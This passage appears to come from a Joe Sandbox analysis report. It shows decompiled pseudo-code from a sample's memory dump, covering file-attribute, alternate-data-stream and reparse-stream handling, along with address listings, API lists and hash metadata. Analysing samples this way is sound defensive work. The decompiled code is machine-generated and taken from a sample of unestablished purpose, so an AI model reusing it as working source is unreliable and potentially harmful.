								_t209 =  *((intOrPtr*)(_t336 - 0x38));
								if(_t208 == 0) {
									L31:
									_t210 = E00B169AB(_t334, _t209,  *((intOrPtr*)(_t336 + 0xc)));
									__eflags = _t210;
									if(_t210 == 0) {
										E00B11E89(E00B11E89(_t210,  *((intOrPtr*)(_t336 - 0x38))),  *((intOrPtr*)(_t336 - 0x2c)));
										goto L46;
									}
									_t332 = 0;
									__eflags = 0;
									L33:
									 *(_t334 + 0x20) =  *(_t334 + 0x20) & 0x0000fbef;
									_t68 = _t336 - 0x60;
									 *_t68 =  *(_t336 - 0x60) | 0xffffffff;
									__eflags =  *_t68;
									 *_t334 = _t332;
									 *((intOrPtr*)(_t334 + 4)) = _t332;
									_t71 = _t336 - 0x38; // -56
									_t72 = _t336 - 0x5c; // -92
									 *(_t336 - 4) = 3;
									E00B12EA8(_t72,  *_t68, _t71);
									_t74 = _t336 - 0x50; // -80
									 *(_t336 - 4) = 4;
									E00B12D90(_t74);
									while(1) {
										_t76 = _t336 + 0xf; // 0xf
										_t77 = _t336 - 0x60; // -96
										_t78 = _t336 - 0x50; // -80
										 *(_t336 - 4) = 5;
										_t218 = E00B168EE(_t77, _t336, _t78);
										__eflags = _t218;
										if(_t218 == 0) {
											break;
										}
										__eflags =  *((char*)(_t336 + 0xf));
										if( *((char*)(_t336 + 0xf)) == 0) {
											SetLastError(2);
											break;
										}
										_t224 = E00B12308( *((intOrPtr*)(_t336 - 0x50)),  *((intOrPtr*)(_t336 - 0x2c)));
										__eflags = _t224;
										if(_t224 != 0) {
											_t309 =  *(_t336 - 0x4c);
											__eflags = _t309 - 7;
											if(__eflags > 0) {
												_t228 = _t309 - 6;
												__eflags = _t228 - _t309;
												if(__eflags < 0) {
													 *(_t336 - 0x4c) = _t228;
													 *((short*)( *((intOrPtr*)(_t336 - 0x50)) + _t228 * 2)) = _t332;
												}
											}
											_t92 = _t336 - 0x50; // -80
											L00B13171(_t334 + 0x28, __eflags, _t92);
											 *((char*)(_t334 + 0x24)) = 1;
											 *_t334 =  *((intOrPtr*)(_t336 - 0x40));
											_t218 =  *((intOrPtr*)(_t336 - 0x3c));
											 *((intOrPtr*)(_t334 + 4)) =  *((intOrPtr*)(_t336 - 0x3c));
											_t256 = 1;
											L44:
											E00B11E89(E00B11E89(_t218,  *((intOrPtr*)(_t336 - 0x50))),  *(_t336 - 0x5c));
											_t100 = _t336 - 0x60; // -96
											E00B11E89(E00B11E89(E00B16581(_t100),  *((intOrPtr*)(_t336 - 0x38))),  *((intOrPtr*)(_t336 - 0x2c)));
											goto L81;
										}
										 *(_t336 - 4) = 4;
										E00B11E89(_t224,  *((intOrPtr*)(_t336 - 0x50)));
										_t85 = _t336 - 0x50; // -80
										E00B12D90(_t85);
									}
									_t256 = 0;
									goto L44;
								}
								__eflags = _t254 - 2;
								if(_t254 == 2) {
									L29:
									E00B16529(_t334);
									_t315 = _t334 + 0x28;
									_t332 = 0;
									__eflags = _t254 - 2;
									 *((intOrPtr*)(_t334 + 0x2c)) = 0;
									 *( *(_t334 + 0x28)) = 0;
									if(_t254 == 2) {
										_t64 = _t336 - 0x38; // -56
										L00B12F78(_t315, _t64);
									}
									goto L33;
								}
								__eflags = _t254 - 3;
								if(_t254 != 3) {
									goto L31;
								}
								__eflags =  *((short*)(_t209 + 4)) - 0x5c;
								if( *((short*)(_t209 + 4)) != 0x5c) {
									goto L31;
								}
								goto L29;
							}
							goto L24;
						}
					}
					E00B16529(_t334);
					_t260 = _t330 + 8;
					L00B12F14(_t334 + 0x28, _t260);
					 *((char*)(_t334 + 0x25)) = 1;
					_t239 = E00B184FE(_t260);
					__eflags = _t239;
					if(_t239 == 0) {
						L12:
						 *(_t336 - 0x60) =  *(_t336 - 0x60) | 0xffffffff;
						 *(_t336 - 0x5c) =  *(_t336 - 0x5c) & 0x00000000;
						 *(_t336 - 4) =  *(_t336 - 4) & 0x00000000;
						_t240 = L00B17860(_t330);
						__eflags = _t240;
						if(_t240 != 0) {
							__eflags =  *((char*)(_t336 - 0x5a));
							if( *((char*)(_t336 - 0x5a)) != 0) {
								 *_t334 =  *((intOrPtr*)(_t336 - 0x58));
								 *((intOrPtr*)(_t334 + 4)) =  *((intOrPtr*)(_t336 - 0x54));
							}
							_t256 = 1;
						} else {
							_t256 = 0;
						}
						_t35 = _t336 - 0x60; // -96
						E00B1736B(_t35);
						goto L81;
					}
					__eflags =  *((short*)(_t330 + 0xc));
					if( *((short*)(_t330 + 0xc)) != 0) {
						goto L12;
					}
					 *(_t336 - 0x12) =  *(_t336 - 0x12) & 0x00000000;
					 *((short*)(_t336 - 0x18)) =  *_t260;
					_t15 = _t336 - 0x28; // -40
					_t16 = _t336 - 0x20; // -32
					_t17 = _t336 - 0x34; // -52
					_t18 = _t336 - 0x18; // -24
					 *((short*)(_t336 - 0x16)) = 0x3a;
					 *(_t336 - 0x14) = 0x5c;
					_t247 = L00B18F71(_t18, _t17, _t16, _t15);
					__eflags = _t247;
					if(_t247 == 0) {
						goto L12;
					} else {
						 *_t334 =  *((intOrPtr*)(_t336 - 0x20));
						 *((intOrPtr*)(_t334 + 4)) =  *((intOrPtr*)(_t336 - 0x1c));
						goto L89;
					}
				}
			}











































                                                                                                                    0x00b169b0
                                                                                                                    0x00b169bb
                                                                                                                    0x00b169be
                                                                                                                    0x00b169c0
                                                                                                                    0x00b169c7
                                                                                                                    0x00b169cf
                                                                                                                    0x00b169d7
                                                                                                                    0x00b169e4
                                                                                                                    0x00b169e7
                                                                                                                    0x00000000
                                                                                                                    0x00b169f0
                                                                                                                    0x00b169f2
                                                                                                                    0x00b169fb
                                                                                                                    0x00b16a00
                                                                                                                    0x00000000
                                                                                                                    0x00b16a00
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b16a0c
                                                                                                                    0x00b16a0c
                                                                                                                    0x00b16a13
                                                                                                                    0x00b16a15
                                                                                                                    0x00b16ac7
                                                                                                                    0x00b16ac9
                                                                                                                    0x00b16acb
                                                                                                                    0x00b16c85
                                                                                                                    0x00b16c85
                                                                                                                    0x00b16c8b
                                                                                                                    0x00b16c92
                                                                                                                    0x00b16c94
                                                                                                                    0x00b16c99
                                                                                                                    0x00b16c9b
                                                                                                                    0x00b16c9f
                                                                                                                    0x00b16c9f
                                                                                                                    0x00b16ca3
                                                                                                                    0x00b16ca6
                                                                                                                    0x00b16cab
                                                                                                                    0x00b16cad
                                                                                                                    0x00b16d0a
                                                                                                                    0x00b16d0a
                                                                                                                    0x00b16d0d
                                                                                                                    0x00b16d11
                                                                                                                    0x00b16d1d
                                                                                                                    0x00b16d1d
                                                                                                                    0x00b16d22
                                                                                                                    0x00b16d24
                                                                                                                    0x00b16d56
                                                                                                                    0x00b16d5b
                                                                                                                    0x00b16d5d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b16d63
                                                                                                                    0x00b16d68
                                                                                                                    0x00b16d6b
                                                                                                                    0x00b16d6e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b16d7b
                                                                                                                    0x00b16d7d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b16d86
                                                                                                                    0x00b16d8b
                                                                                                                    0x00b16d8d
                                                                                                                    0x00b16d9e
                                                                                                                    0x00b16da1
                                                                                                                    0x00b16da8
                                                                                                                    0x00b16dab
                                                                                                                    0x00b16daf
                                                                                                                    0x00b16db6
                                                                                                                    0x00b16db9
                                                                                                                    0x00b16dbe
                                                                                                                    0x00b16dc2
                                                                                                                    0x00b16dc3
                                                                                                                    0x00b16dc6
                                                                                                                    0x00b16dc9
                                                                                                                    0x00b16dce
                                                                                                                    0x00b16dd0
                                                                                                                    0x00b16df8
                                                                                                                    0x00b16dfa
                                                                                                                    0x00b16dff
                                                                                                                    0x00b16e03
                                                                                                                    0x00b16e05
                                                                                                                    0x00b16e62
                                                                                                                    0x00b16e64
                                                                                                                    0x00b16e69
                                                                                                                    0x00b16e6c
                                                                                                                    0x00b16e73
                                                                                                                    0x00b16e6e
                                                                                                                    0x00b16e6e
                                                                                                                    0x00b16e6e
                                                                                                                    0x00b16e7a
                                                                                                                    0x00b16e7d
                                                                                                                    0x00b16e80
                                                                                                                    0x00b16e88
                                                                                                                    0x00b16e8e
                                                                                                                    0x00b16e8e
                                                                                                                    0x00b16e91
                                                                                                                    0x00b16e96
                                                                                                                    0x00b16e96
                                                                                                                    0x00000000
                                                                                                                    0x00b16e96
                                                                                                                    0x00b16e07
                                                                                                                    0x00b16e0a
                                                                                                                    0x00b16e11
                                                                                                                    0x00b16e14
                                                                                                                    0x00b16e18
                                                                                                                    0x00000000
                                                                                                                    0x00b16e1d
                                                                                                                    0x00b16e0c
                                                                                                                    0x00b16e0f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b16e0f
                                                                                                                    0x00b16dd5
                                                                                                                    0x00b16dde
                                                                                                                    0x00b16de5
                                                                                                                    0x00b16de8
                                                                                                                    0x00b16df4
                                                                                                                    0x00000000
                                                                                                                    0x00b16df4
                                                                                                                    0x00b16dea
                                                                                                                    0x00b16ded
                                                                                                                    0x00000000
                                                                                                                    0x00b16ded
                                                                                                                    0x00b16d93
                                                                                                                    0x00000000
                                                                                                                    0x00b16d93
                                                                                                                    0x00b16d2b
                                                                                                                    0x00b16d2d
                                                                                                                    0x00b16d30
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b16d36
                                                                                                                    0x00b16d39
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b16d41
                                                                                                                    0x00b16d49
                                                                                                                    0x00b16d4d
                                                                                                                    0x00b16d51
                                                                                                                    0x00000000
                                                                                                                    0x00b16d51
                                                                                                                    0x00b16d13
                                                                                                                    0x00b16d17
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b16caf
                                                                                                                    0x00b16caf
                                                                                                                    0x00b16cb5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b16cbe
                                                                                                                    0x00b16cc0
                                                                                                                    0x00b16cc3
                                                                                                                    0x00b16e1e
                                                                                                                    0x00b16e1e
                                                                                                                    0x00b16e1f
                                                                                                                    0x00b16e20
                                                                                                                    0x00b16e23
                                                                                                                    0x00b16e28
                                                                                                                    0x00b16e2c
                                                                                                                    0x00b16e2e
                                                                                                                    0x00b16e30
                                                                                                                    0x00b16e38
                                                                                                                    0x00b16e3b
                                                                                                                    0x00b16e40
                                                                                                                    0x00b16e40
                                                                                                                    0x00b16e3b
                                                                                                                    0x00b16e30
                                                                                                                    0x00b16e45
                                                                                                                    0x00b16e47
                                                                                                                    0x00b16e47
                                                                                                                    0x00b16e4a
                                                                                                                    0x00b16e4f
                                                                                                                    0x00b16e4f
                                                                                                                    0x00b16e51
                                                                                                                    0x00b16e57
                                                                                                                    0x00b16e5f
                                                                                                                    0x00b16e5f
                                                                                                                    0x00b16cc9
                                                                                                                    0x00b16ccc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b16cd4
                                                                                                                    0x00b16cdc
                                                                                                                    0x00b16cdf
                                                                                                                    0x00b16ce4
                                                                                                                    0x00b16ceb
                                                                                                                    0x00b16cec
                                                                                                                    0x00b16cef
                                                                                                                    0x00b16cf1
                                                                                                                    0x00b16cf4
                                                                                                                    0x00b16cf6
                                                                                                                    0x00b16cf6
                                                                                                                    0x00b16cf6
                                                                                                                    0x00b16cf6
                                                                                                                    0x00b16cfe
                                                                                                                    0x00b16d03
                                                                                                                    0x00b16d03
                                                                                                                    0x00000000
                                                                                                                    0x00b16d03
                                                                                                                    0x00b16cad
                                                                                                                    0x00b16ad1
                                                                                                                    0x00b16ad7
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b16ae0
                                                                                                                    0x00b16ae4
                                                                                                                    0x00b16aea
                                                                                                                    0x00b16aed
                                                                                                                    0x00b16af4
                                                                                                                    0x00b16af9
                                                                                                                    0x00b16afc
                                                                                                                    0x00b16b00
                                                                                                                    0x00b16b02
                                                                                                                    0x00b16b05
                                                                                                                    0x00b16b08
                                                                                                                    0x00b16b08
                                                                                                                    0x00b16b08
                                                                                                                    0x00b16b08
                                                                                                                    0x00b16b0d
                                                                                                                    0x00b16b10
                                                                                                                    0x00b16b13
                                                                                                                    0x00b16b2a
                                                                                                                    0x00b16b2f
                                                                                                                    0x00b16b32
                                                                                                                    0x00000000
                                                                                                                    0x00b16b15
                                                                                                                    0x00b16b21
                                                                                                                    0x00b16b26
                                                                                                                    0x00b16b28
                                                                                                                    0x00b16b37
                                                                                                                    0x00b16b3a
                                                                                                                    0x00b16b3f
                                                                                                                    0x00b16b41
                                                                                                                    0x00b16b44
                                                                                                                    0x00b16b7c
                                                                                                                    0x00b16b82
                                                                                                                    0x00b16b87
                                                                                                                    0x00b16b89
                                                                                                                    0x00b16c7e
                                                                                                                    0x00000000
                                                                                                                    0x00b16c84
                                                                                                                    0x00b16b8f
                                                                                                                    0x00b16b8f
                                                                                                                    0x00b16b91
                                                                                                                    0x00b16b91
                                                                                                                    0x00b16b97
                                                                                                                    0x00b16b97
                                                                                                                    0x00b16b97
                                                                                                                    0x00b16b9b
                                                                                                                    0x00b16b9d
                                                                                                                    0x00b16ba0
                                                                                                                    0x00b16ba3
                                                                                                                    0x00b16ba7
                                                                                                                    0x00b16bab
                                                                                                                    0x00b16bb0
                                                                                                                    0x00b16bb3
                                                                                                                    0x00b16bb7
                                                                                                                    0x00b16bbc
                                                                                                                    0x00b16bbc
                                                                                                                    0x00b16bbf
                                                                                                                    0x00b16bc3
                                                                                                                    0x00b16bc7
                                                                                                                    0x00b16bcb
                                                                                                                    0x00b16bd0
                                                                                                                    0x00b16bd2
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b16bd4
                                                                                                                    0x00b16bd8
                                                                                                                    0x00b16c02
                                                                                                                    0x00000000
                                                                                                                    0x00b16c02
                                                                                                                    0x00b16be0
                                                                                                                    0x00b16be5
                                                                                                                    0x00b16be7
                                                                                                                    0x00b16c0c
                                                                                                                    0x00b16c0f
                                                                                                                    0x00b16c12
                                                                                                                    0x00b16c14
                                                                                                                    0x00b16c17
                                                                                                                    0x00b16c19
                                                                                                                    0x00b16c1e
                                                                                                                    0x00b16c21
                                                                                                                    0x00b16c21
                                                                                                                    0x00b16c19
                                                                                                                    0x00b16c25
                                                                                                                    0x00b16c2c
                                                                                                                    0x00b16c34
                                                                                                                    0x00b16c38
                                                                                                                    0x00b16c3a
                                                                                                                    0x00b16c3d
                                                                                                                    0x00b16c40
                                                                                                                    0x00b16c42
                                                                                                                    0x00b16c4d
                                                                                                                    0x00b16c54
                                                                                                                    0x00b16c67
                                                                                                                    0x00000000
                                                                                                                    0x00b16c6d
                                                                                                                    0x00b16bec
                                                                                                                    0x00b16bf0
                                                                                                                    0x00b16bf6
                                                                                                                    0x00b16bf9
                                                                                                                    0x00b16bf9
                                                                                                                    0x00b16c08
                                                                                                                    0x00000000
                                                                                                                    0x00b16c08
                                                                                                                    0x00b16b46
                                                                                                                    0x00b16b49
                                                                                                                    0x00b16b57
                                                                                                                    0x00b16b59
                                                                                                                    0x00b16b61
                                                                                                                    0x00b16b64
                                                                                                                    0x00b16b66
                                                                                                                    0x00b16b69
                                                                                                                    0x00b16b6c
                                                                                                                    0x00b16b6f
                                                                                                                    0x00b16b71
                                                                                                                    0x00b16b75
                                                                                                                    0x00b16b75
                                                                                                                    0x00000000
                                                                                                                    0x00b16b6f
                                                                                                                    0x00b16b4b
                                                                                                                    0x00b16b4e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b16b50
                                                                                                                    0x00b16b55
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b16b55
                                                                                                                    0x00000000
                                                                                                                    0x00b16b28
                                                                                                                    0x00b16b13
                                                                                                                    0x00b16a1d
                                                                                                                    0x00b16a22
                                                                                                                    0x00b16a29
                                                                                                                    0x00b16a30
                                                                                                                    0x00b16a34
                                                                                                                    0x00b16a39
                                                                                                                    0x00b16a3b
                                                                                                                    0x00b16a83
                                                                                                                    0x00b16a83
                                                                                                                    0x00b16a87
                                                                                                                    0x00b16a8b
                                                                                                                    0x00b16a93
                                                                                                                    0x00b16a98
                                                                                                                    0x00b16a9a
                                                                                                                    0x00b16aa0
                                                                                                                    0x00b16aa4
                                                                                                                    0x00b16aa9
                                                                                                                    0x00b16aae
                                                                                                                    0x00b16aae
                                                                                                                    0x00b16ab1
                                                                                                                    0x00b16a9c
                                                                                                                    0x00b16a9c
                                                                                                                    0x00b16a9c
                                                                                                                    0x00b16ab3
                                                                                                                    0x00b16ab6
                                                                                                                    0x00000000
                                                                                                                    0x00b16ab6
                                                                                                                    0x00b16a3d
                                                                                                                    0x00b16a42
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b16a47
                                                                                                                    0x00b16a4c
                                                                                                                    0x00b16a50
                                                                                                                    0x00b16a54
                                                                                                                    0x00b16a58
                                                                                                                    0x00b16a5b
                                                                                                                    0x00b16a5e
                                                                                                                    0x00b16a64
                                                                                                                    0x00b16a6a
                                                                                                                    0x00b16a6f
                                                                                                                    0x00b16a71
                                                                                                                    0x00000000
                                                                                                                    0x00b16a73
                                                                                                                    0x00b16a76
                                                                                                                    0x00b16a7b
                                                                                                                    0x00000000
                                                                                                                    0x00b16a7b
                                                                                                                    0x00b16a71

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B169B0
                                                                                                                    • SetLastError.KERNEL32(00000002,-00000050,0000000F,-00000038,:$DATA,?,00000000,?), ref: 00B16C02
                                                                                                                      • Part of subcall function 00B169AB: wcscmp.MSVCRT ref: 00B16DDE
                                                                                                                      • Part of subcall function 00B1692E: __EH_prolog.LIBCMT ref: 00B16933
                                                                                                                      • Part of subcall function 00B1692E: GetFileAttributesW.KERNELBASE(?,?,?,00000000,?), ref: 00B16953
                                                                                                                      • Part of subcall function 00B1692E: GetFileAttributesW.KERNELBASE(?,00000000,?,?,00000000,?), ref: 00B16982
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFileH_prolog$ErrorLastwcscmp
                                                                                                                    • String ID: :$DATA
                                                                                                                    • API String ID: 3316598575-2587938151
                                                                                                                    • Opcode ID: b2238dcc2aab9d9d1fa2478a510a03cadc77d85aa28fcab7275d565f898eafb2
                                                                                                                    • Instruction ID: dfcb056d3057d5e7ef69a80ea63dd32b0506a703de7cad403394143080033e45
                                                                                                                    • Opcode Fuzzy Hash: b2238dcc2aab9d9d1fa2478a510a03cadc77d85aa28fcab7275d565f898eafb2
                                                                                                                    • Instruction Fuzzy Hash: CCE1F235900209DACF24EFA8C4957EEB7F1FF14314F90869DE846672A1EB7099CACB51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B25CBE Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 125COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 84%
                                                                                                                    			E00B25CBE(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				char _t53;
				char _t55;
				intOrPtr _t56;
				intOrPtr _t62;
				intOrPtr* _t63;
				intOrPtr _t65;
				char _t67;
				intOrPtr _t88;
				void* _t90;
				char _t91;
				void* _t93;
				char _t94;
				void* _t96;

				L00B7F140(0xb83d64, _t96);
				_t93 = __ecx;
				 *((intOrPtr*)(_t96 - 0x14)) = 0;
				_t88 = 0;
				 *((char*)(_t96 - 0xd)) = 0;
				 *((char*)(_t96 - 0xe)) = 0;
				L00B2319F(_t96 - 0x28);
				 *((intOrPtr*)(_t96 - 4)) = 0;
				if( *((intOrPtr*)(_t93 + 0x12c)) == 0) {
					L11:
					_t53 = L00B255A5(0, _t93, _t88); // executed
					 *((intOrPtr*)(_t96 - 0x18)) = _t53;
					if( *((intOrPtr*)(_t96 - 0x14)) != 0) {
						L13:
						_t94 =  *((intOrPtr*)(_t96 - 0x14));
						L25:
						E00B11E89(_t53,  *((intOrPtr*)(_t96 - 0x24)));
						_t55 = _t94;
						L26:
						 *[fs:0x0] =  *((intOrPtr*)(_t96 - 0xc));
						return _t55;
					}
					 *((intOrPtr*)(_t96 - 0x14)) = _t53;
					if(_t53 == 0) {
						__eflags =  *((intOrPtr*)(_t96 - 0xd));
						if( *((intOrPtr*)(_t96 - 0xd)) == 0) {
							L24:
							_t94 =  *((intOrPtr*)(_t96 - 0x18));
							goto L25;
						}
						__eflags =  *((intOrPtr*)(_t96 - 0xe));
						 *((intOrPtr*)(_t93 + 0x108)) = _t88;
						 *((intOrPtr*)(_t93 + 0x10c)) = 0;
						 *((char*)(_t93 + 0x3b)) = 1;
						if(__eflags == 0) {
							goto L24;
						}
						_t90 = _t93 + 0xc0;
						_t56 = L00B15DB5( *((intOrPtr*)(_t93 + 0xc0)), __eflags);
						__eflags = _t56;
						if(_t56 != 0) {
							L19:
							_push(_t96 - 0xf);
							_push(_t96 - 0x28);
							_push(_t90);
							 *((char*)(_t96 - 0xf)) = 0;
							_t53 = L00B25857(_t93);
							_t91 = _t53;
							__eflags = _t91;
							if(_t91 == 0) {
								__eflags =  *((intOrPtr*)(_t96 - 0xf));
								if( *((intOrPtr*)(_t96 - 0xf)) == 0) {
									 *((char*)(_t93 + 0x38)) = 0;
								} else {
									__eflags =  *((intOrPtr*)(_t96 - 0x28));
									 *((char*)(_t93 + 0x39)) = _t53;
								}
								goto L24;
							}
							E00B11E89(_t53,  *((intOrPtr*)(_t96 - 0x24)));
							_t55 = _t91;
							goto L26;
						}
						_push(_t90);
						_push("can\'t delete file");
						_t53 = L00B23AF8(_t93);
						__eflags = _t53;
						if(_t53 == 0) {
							goto L19;
						} else {
							_t94 = _t53;
							goto L25;
						}
					}
					goto L13;
				}
				 *((char*)(_t96 - 0xd)) = 1;
				_t88 =  *((intOrPtr*)( *((intOrPtr*)(_t93 + 0x128)) + 0x10));
				if( *((intOrPtr*)(_t93 + 0x3b)) == 0 || _t88 !=  *((intOrPtr*)(_t93 + 0x124))) {
					_push(_t93 + 0x80);
					_push("Unknown reparse stream");
					L6:
					_t62 = L00B23AF8(_t93);
					_t82 =  *((intOrPtr*)(_t93 + 0x11c));
					 *((intOrPtr*)(_t96 - 0x14)) = _t62;
					if( *((intOrPtr*)(_t93 + 0x11c)) != 0) {
						_t65 = E00B1FED3(_t82,  *((intOrPtr*)(_t93 + 0x120)), _t88);
						if( *((intOrPtr*)(_t96 - 0x14)) == 0) {
							 *((intOrPtr*)(_t96 - 0x14)) = _t65;
						}
					}
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t93 + 0x37)));
					_push(_t88);
					_push( *((intOrPtr*)(_t93 + 0x120)));
					_t67 = L00B25B6A(_t96 - 0x28);
					 *((char*)(_t96 - 0xe)) = _t67;
					if(_t67 != 0) {
						L9:
						_t63 =  *((intOrPtr*)(_t93 + 0x12c));
						if(_t63 != 0) {
							 *((intOrPtr*)( *_t63 + 8))(_t63);
							 *((intOrPtr*)(_t93 + 0x12c)) = 0;
						}
						goto L11;
					} else {
						_push(_t93 + 0x80);
						_push("Incorrect reparse stream");
						goto L6;
					}
				}
			}


















                                                                                                                    0x00b25cc3
                                                                                                                    0x00b25ccd
                                                                                                                    0x00b25cd5
                                                                                                                    0x00b25cd8
                                                                                                                    0x00b25cda
                                                                                                                    0x00b25cdd
                                                                                                                    0x00b25ce0
                                                                                                                    0x00b25ceb
                                                                                                                    0x00b25cee
                                                                                                                    0x00b25d81
                                                                                                                    0x00b25d83
                                                                                                                    0x00b25d8b
                                                                                                                    0x00b25d8e
                                                                                                                    0x00b25d97
                                                                                                                    0x00b25d97
                                                                                                                    0x00b25e1f
                                                                                                                    0x00b25e22
                                                                                                                    0x00b25e28
                                                                                                                    0x00b25e2a
                                                                                                                    0x00b25e30
                                                                                                                    0x00b25e38
                                                                                                                    0x00b25e38
                                                                                                                    0x00b25d92
                                                                                                                    0x00b25d95
                                                                                                                    0x00b25d9f
                                                                                                                    0x00b25da2
                                                                                                                    0x00b25e1c
                                                                                                                    0x00b25e1c
                                                                                                                    0x00000000
                                                                                                                    0x00b25e1c
                                                                                                                    0x00b25da4
                                                                                                                    0x00b25da7
                                                                                                                    0x00b25dad
                                                                                                                    0x00b25db3
                                                                                                                    0x00b25db7
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b25dbf
                                                                                                                    0x00b25dc5
                                                                                                                    0x00b25dca
                                                                                                                    0x00b25dcc
                                                                                                                    0x00b25de3
                                                                                                                    0x00b25de8
                                                                                                                    0x00b25dec
                                                                                                                    0x00b25ded
                                                                                                                    0x00b25dee
                                                                                                                    0x00b25df1
                                                                                                                    0x00b25df6
                                                                                                                    0x00b25df8
                                                                                                                    0x00b25dfa
                                                                                                                    0x00b25e09
                                                                                                                    0x00b25e0c
                                                                                                                    0x00b25e19
                                                                                                                    0x00b25e0e
                                                                                                                    0x00b25e0e
                                                                                                                    0x00b25e14
                                                                                                                    0x00b25e14
                                                                                                                    0x00000000
                                                                                                                    0x00b25e0c
                                                                                                                    0x00b25dff
                                                                                                                    0x00b25e05
                                                                                                                    0x00000000
                                                                                                                    0x00b25e05
                                                                                                                    0x00b25dce
                                                                                                                    0x00b25dcf
                                                                                                                    0x00b25dd6
                                                                                                                    0x00b25ddb
                                                                                                                    0x00b25ddd
                                                                                                                    0x00000000
                                                                                                                    0x00b25ddf
                                                                                                                    0x00b25ddf
                                                                                                                    0x00000000
                                                                                                                    0x00b25ddf
                                                                                                                    0x00b25ddd
                                                                                                                    0x00000000
                                                                                                                    0x00b25d95
                                                                                                                    0x00b25cfd
                                                                                                                    0x00b25d01
                                                                                                                    0x00b25d04
                                                                                                                    0x00b25d3d
                                                                                                                    0x00b25d3e
                                                                                                                    0x00b25d43
                                                                                                                    0x00b25d45
                                                                                                                    0x00b25d4a
                                                                                                                    0x00b25d50
                                                                                                                    0x00b25d55
                                                                                                                    0x00b25d5e
                                                                                                                    0x00b25d66
                                                                                                                    0x00b25d68
                                                                                                                    0x00b25d68
                                                                                                                    0x00b25d66
                                                                                                                    0x00000000
                                                                                                                    0x00b25d0e
                                                                                                                    0x00b25d17
                                                                                                                    0x00b25d18
                                                                                                                    0x00b25d19
                                                                                                                    0x00b25d1d
                                                                                                                    0x00b25d24
                                                                                                                    0x00b25d27
                                                                                                                    0x00b25d6b
                                                                                                                    0x00b25d6b
                                                                                                                    0x00b25d73
                                                                                                                    0x00b25d78
                                                                                                                    0x00b25d7b
                                                                                                                    0x00b25d7b
                                                                                                                    0x00000000
                                                                                                                    0x00b25d29
                                                                                                                    0x00b25d2f
                                                                                                                    0x00b25d30
                                                                                                                    0x00000000
                                                                                                                    0x00b25d30
                                                                                                                    0x00b25d27

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B25CC3
                                                                                                                      • Part of subcall function 00B25B6A: __EH_prolog.LIBCMT ref: 00B25B6F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID: Incorrect reparse stream$Unknown reparse stream$can't delete file
                                                                                                                    • API String ID: 3519838083-394804653
                                                                                                                    • Opcode ID: 7e59fbae0fc629ee5a2e3144b5ea7bdc215fa249df6b9ff1024a1651e90e086c
                                                                                                                    • Instruction ID: 6301c260f0dcdd91171840d1188a685244de5e0c16962a57445f45aa5041975d
                                                                                                                    • Opcode Fuzzy Hash: 7e59fbae0fc629ee5a2e3144b5ea7bdc215fa249df6b9ff1024a1651e90e086c
                                                                                                                    • Instruction Fuzzy Hash: 6441B872900A94DFCF31EFA894849EEBBF4EF59340F5844EED08AA3101C6306E45CB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B472D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65COMMON
                                                                                                                    Download Yara Rule
